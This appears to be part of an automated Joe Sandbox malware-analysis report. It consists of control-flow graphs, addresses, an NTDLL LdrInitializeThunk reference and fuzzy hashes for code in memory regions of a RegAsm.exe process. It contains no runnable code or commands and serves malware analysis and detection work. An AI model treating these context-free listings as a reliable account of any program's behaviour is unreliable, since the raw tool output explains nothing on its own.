                                                                                                                                                                                        control_flow_graph 1415 2aac168-2aac178 1416 2aac17a 1415->1416 1417 2aac17f-2aac18b 1415->1417 1418 2aac2ab-2aac2b5 1416->1418 1420 2aac18d 1417->1420 1421 2aac192-2aac1a7 1417->1421 1420->1418 1424 2aac2bb-2aac2fb call 2aa5d08 1421->1424 1425 2aac1ad-2aac1b8 1421->1425 1441 2aac302-2aac378 call 2aa5d08 call 2aa5c00 1424->1441 1428 2aac1be-2aac1c5 1425->1428 1429 2aac2b6 1425->1429 1431 2aac1f2-2aac1fd 1428->1431 1432 2aac1c7-2aac1de 1428->1432 1429->1424 1436 2aac20a-2aac214 1431->1436 1437 2aac1ff-2aac207 1431->1437 1432->1441 1442 2aac1e4-2aac1e7 1432->1442 1447 2aac21a-2aac224 1436->1447 1448 2aac29e-2aac2a3 1436->1448 1437->1436 1476 2aac37a-2aac3b7 1441->1476 1477 2aac3df-2aac454 call 2aa5ca8 1441->1477 1442->1429 1446 2aac1ed-2aac1f0 1442->1446 1446->1431 1446->1432 1447->1429 1452 2aac22a-2aac246 1447->1452 1448->1418 1458 2aac24a-2aac24d 1452->1458 1459 2aac248 1452->1459 1461 2aac24f-2aac252 1458->1461 1462 2aac254-2aac257 1458->1462 1459->1418 1464 2aac25a-2aac268 1461->1464 1462->1464 1464->1429 1469 2aac26a-2aac271 1464->1469 1469->1418 1470 2aac273-2aac279 1469->1470 1470->1429 1471 2aac27b-2aac280 1470->1471 1471->1429 1473 2aac282-2aac295 1471->1473 1473->1429 1479 2aac297-2aac29a 1473->1479 1480 2aac3b9 1476->1480 1481 2aac3be-2aac3dc 1476->1481 1484 2aac4f3-2aac4f9 1477->1484 1479->1470 1483 2aac29c 1479->1483 1480->1481 1481->1477 1483->1418 1485 2aac459-2aac46c 1484->1485 1486 2aac4ff-2aac517 1484->1486 1487 2aac46e 1485->1487 1488 2aac473-2aac4c4 1485->1488 1489 2aac52b-2aac53e 1486->1489 1490 2aac519-2aac526 1486->1490 1487->1488 1508 2aac4c6-2aac4d4 1488->1508 1509 2aac4d7-2aac4e9 1488->1509 1492 2aac540 1489->1492 1493 2aac545-2aac561 1489->1493 1491 2aac8c1-2aac9bf 1490->1491 1498 2aac9c1-2aac9c6 call 2aa5ca8 1491->1498 1499 2aac9c7-2aac9d1 1491->1499 1492->1493 1495 2aac568-2aac58c 1493->1495 1496 2aac563 1493->1496 1503 2aac58e 1495->1503 1504 2aac593-2aac5c5 1495->1504 1496->1495 1498->1499 1503->1504 1513 2aac5cc-2aac60e 1504->1513 1514 2aac5c7 1504->1514 1508->1486 1510 2aac4eb 1509->1510 1511 2aac4f0 1509->1511 1510->1511 1511->1484 1516 2aac610 1513->1516 1517 2aac615-2aac61e 1513->1517 1514->1513 1516->1517 1518 2aac846-2aac84c 1517->1518 1519 2aac852-2aac865 1518->1519 1520 2aac623-2aac648 1518->1520 1523 2aac86c-2aac887 1519->1523 1524 2aac867 1519->1524 1521 2aac64a 1520->1521 1522 2aac64f-2aac686 1520->1522 1521->1522 1532 2aac688 1522->1532 1533 2aac68d-2aac6bf 1522->1533 1525 2aac889 1523->1525 1526 2aac88e-2aac8a2 1523->1526 1524->1523 1525->1526 1530 2aac8a9-2aac8bf LdrInitializeThunk 1526->1530 1531 2aac8a4 1526->1531 1530->1491 1531->1530 1532->1533 1535 2aac723-2aac736 1533->1535 1536 2aac6c1-2aac6e6 1533->1536 1537 2aac738 1535->1537 1538 2aac73d-2aac762 1535->1538 1539 2aac6e8 1536->1539 1540 2aac6ed-2aac71b 1536->1540 1537->1538 1543 2aac771-2aac7a9 1538->1543 1544 2aac764-2aac765 1538->1544 1539->1540 1540->1535 1545 2aac7ab 1543->1545 1546 2aac7b0-2aac811 call 2aac168 1543->1546 1544->1519 1545->1546 1552 2aac818-2aac83c 1546->1552 1553 2aac813 1546->1553 1556 2aac83e 1552->1556 1557 2aac843 1552->1557 1553->1552 1556->1557 1557->1518
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6369bbe961a5091007eb2599632c5a8e9b2d65c86a76da7270be5beb3c6daf9c
                                                                                                                                                                                        • Instruction ID: ed3afd5d805b3ac47d6a19c5f42e13248ecb09aca88217938c41e77d11fa31bb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6369bbe961a5091007eb2599632c5a8e9b2d65c86a76da7270be5beb3c6daf9c
                                                                                                                                                                                        • Instruction Fuzzy Hash: DB223A74E002188FDB14DFA9C994B9EFBB2BF88314F1095AAD409AB395DB349D85CF50

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 1807 2aa4f08-2aa4f28 1808 2aa4f2a 1807->1808 1809 2aa4f2f-2aa4fc0 1807->1809 1808->1809 1813 2aa4fc6-2aa4fd6 1809->1813 1814 2aa5314-2aa5348 1809->1814 1863 2aa4fd9 call 2aa5358 1813->1863 1864 2aa4fd9 call 2aa56af 1813->1864 1817 2aa4fdf-2aa4fee 1865 2aa4ff0 call 2aac168 1817->1865 1866 2aa4ff0 call 2aac76c 1817->1866 1818 2aa4ff6-2aa5012 1820 2aa5019-2aa5022 1818->1820 1821 2aa5014 1818->1821 1822 2aa5307-2aa530d 1820->1822 1821->1820 1823 2aa5313 1822->1823 1824 2aa5027-2aa50a1 1822->1824 1823->1814 1829 2aa515d-2aa51b8 1824->1829 1830 2aa50a7-2aa5115 call 2aa3760 1824->1830 1842 2aa51b9-2aa5209 1829->1842 1840 2aa5158-2aa515b 1830->1840 1841 2aa5117-2aa5157 1830->1841 1840->1842 1841->1840 1847 2aa520f-2aa52f1 1842->1847 1848 2aa52f2-2aa52fd 1842->1848 1847->1848 1849 2aa52ff 1848->1849 1850 2aa5304 1848->1850 1849->1850 1850->1822 1863->1817 1864->1817 1865->1818 1866->1818
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 1621efe5bfe3ea483d2b81a1d855bf12de8946140ffa7222d6671134d7b92493
                                                                                                                                                                                        • Instruction ID: 3f29349d2730c4824d07b812ed6b5769739d5986e4afa2e09277063cbfa62495
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1621efe5bfe3ea483d2b81a1d855bf12de8946140ffa7222d6671134d7b92493
                                                                                                                                                                                        • Instruction Fuzzy Hash: B0C1A178E10218CFDB54DFA5D994B9DBBB2BF88304F2480A9E809A7394DB355E85CF50

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 1867 2aa5358-2aa5393 1868 2aa539a-2aa542d 1867->1868 1869 2aa5395 1867->1869 1879 2aa5433-2aa5445 1868->1879 1880 2aa5687-2aa5786 1868->1880 1869->1868 1928 2aa544a call 2aa5e30 1879->1928 1929 2aa544a call 2aa5e21 1879->1929 1884 2aa5788-2aa578e 1880->1884 1885 2aa578f-2aa5796 1880->1885 1883 2aa5450-2aa546e 1889 2aa547d-2aa5481 1883->1889 1890 2aa5470-2aa5474 1883->1890 1884->1885 1893 2aa5488 1889->1893 1894 2aa5483 1889->1894 1891 2aa547b 1890->1891 1892 2aa5476 1890->1892 1891->1893 1892->1891 1930 2aa5488 call 2aa75c0 1893->1930 1931 2aa5488 call 2aa75d0 1893->1931 1932 2aa5488 call 2aa7560 1893->1932 1894->1893 1895 2aa548e-2aa54af 1933 2aa54b4 call 2aa75c0 1895->1933 1934 2aa54b4 call 2aa75d0 1895->1934 1935 2aa54b4 call 2aa7560 1895->1935 1897 2aa54ba-2aa54e1 1900 2aa54e8-2aa54ef 1897->1900 1901 2aa54e3 1897->1901 1924 2aa54f5 call 2aa78a9 1900->1924 1925 2aa54f5 call 2aa7a40 1900->1925 1901->1900 1902 2aa54fb-2aa556d 1908 2aa556f 1902->1908 1909 2aa5574-2aa5578 1902->1909 1908->1909 1910 2aa557a 1909->1910 1911 2aa557f-2aa5584 1909->1911 1910->1911 1912 2aa558b-2aa5655 1911->1912 1913 2aa5586 1911->1913 1920 2aa566d-2aa567c 1912->1920 1921 2aa5657-2aa566a 1912->1921 1913->1912 1926 2aa567f call 2aa7e68 1920->1926 1927 2aa567f call 2aa7e59 1920->1927 1921->1920 1922 2aa5685-2aa5686 1922->1880 1924->1902 1925->1902 1926->1922 1927->1922 1928->1883 1929->1883 1930->1895 1931->1895 1932->1895 1933->1897 1934->1897 1935->1897
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c5d0011c800a43b1e6ffa53996baca7f54dfed7925a6ec6a2f3429aa432cd6c0
                                                                                                                                                                                        • Instruction ID: 5a46b5a821e19b519a3e95eeff93a78106cdfc6a457d98080157583a867c6392
                                                                                                                                                                                        • Opcode Fuzzy Hash: c5d0011c800a43b1e6ffa53996baca7f54dfed7925a6ec6a2f3429aa432cd6c0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BA11474D00209CFEB14DFA9C598B9DBBB1FF88304F209269E419B7291DB749985CF54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 007abe6ebc51302ba2054455cc8685c936a5abbf8a227775106f35f8e08d846f
                                                                                                                                                                                        • Instruction ID: e43974989d9b44ba6b75974ba8ffe863b1222257d836f9ec01957d6fb10fa5d8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 007abe6ebc51302ba2054455cc8685c936a5abbf8a227775106f35f8e08d846f
                                                                                                                                                                                        • Instruction Fuzzy Hash: E791F274D00208CFEB14DFA8C598BADBBB1FF49304F249259E409BB291DB749985CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 1558 2aac76c 1559 2aac82b-2aac83c 1558->1559 1560 2aac83e 1559->1560 1561 2aac843-2aac84c 1559->1561 1560->1561 1563 2aac852-2aac865 1561->1563 1564 2aac623-2aac648 1561->1564 1567 2aac86c-2aac887 1563->1567 1568 2aac867 1563->1568 1565 2aac64a 1564->1565 1566 2aac64f-2aac686 1564->1566 1565->1566 1576 2aac688 1566->1576 1577 2aac68d-2aac6bf 1566->1577 1569 2aac889 1567->1569 1570 2aac88e-2aac8a2 1567->1570 1568->1567 1569->1570 1574 2aac8a9-2aac8bf LdrInitializeThunk 1570->1574 1575 2aac8a4 1570->1575 1578 2aac8c1-2aac9bf 1574->1578 1575->1574 1576->1577 1583 2aac723-2aac736 1577->1583 1584 2aac6c1-2aac6e6 1577->1584 1581 2aac9c1-2aac9c6 call 2aa5ca8 1578->1581 1582 2aac9c7-2aac9d1 1578->1582 1581->1582 1586 2aac738 1583->1586 1587 2aac73d-2aac762 1583->1587 1588 2aac6e8 1584->1588 1589 2aac6ed-2aac71b 1584->1589 1586->1587 1593 2aac771-2aac7a9 1587->1593 1594 2aac764-2aac765 1587->1594 1588->1589 1589->1583 1595 2aac7ab 1593->1595 1596 2aac7b0-2aac811 call 2aac168 1593->1596 1594->1563 1595->1596 1602 2aac818-2aac82a 1596->1602 1603 2aac813 1596->1603 1602->1559 1603->1602
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 02AAC8AE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 325e1472d9510aa24de0df93837c23c824159044669d0daec2caf718e0c598f4
                                                                                                                                                                                        • Instruction ID: 3c0d7a6d80d34d74a842e735879b34e73a51cee823f480e06304b7f735401341
                                                                                                                                                                                        • Opcode Fuzzy Hash: 325e1472d9510aa24de0df93837c23c824159044669d0daec2caf718e0c598f4
                                                                                                                                                                                        • Instruction Fuzzy Hash: F2117C75E011099FEB04DFE8D594AADBBB6FF8C314F549166E804A7245DB30E982CB60
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956442926.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_28dd000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6f2ae8c62bb2ba3225acb4abe6a5c7ca3ce6a7d21657a1a3988e624bbfba7441
                                                                                                                                                                                        • Instruction ID: 3953c7f519708dbe4398145f7e57ac0381614eeb9d4dfa790c4a372950f23c02
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2ae8c62bb2ba3225acb4abe6a5c7ca3ce6a7d21657a1a3988e624bbfba7441
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F2122BE504204DFDB14DF14D9C0B26BBA5FBC4318F64C96DD90A8B242C73AD84BCA62
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956442926.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_28dd000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: fb7053d058881120f74de3fac57d62dd1b459d3ea73647d995286087848b6aa3
                                                                                                                                                                                        • Instruction ID: a6641d00e11228d55449b41f75835d5e9e6503bfc3025f321f1510261d10a3d0
                                                                                                                                                                                        • Opcode Fuzzy Hash: fb7053d058881120f74de3fac57d62dd1b459d3ea73647d995286087848b6aa3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 58214D751093C09FCB03CB24D990B11BF71AB46214F29C5DBD8898F6A7C33A984ACB62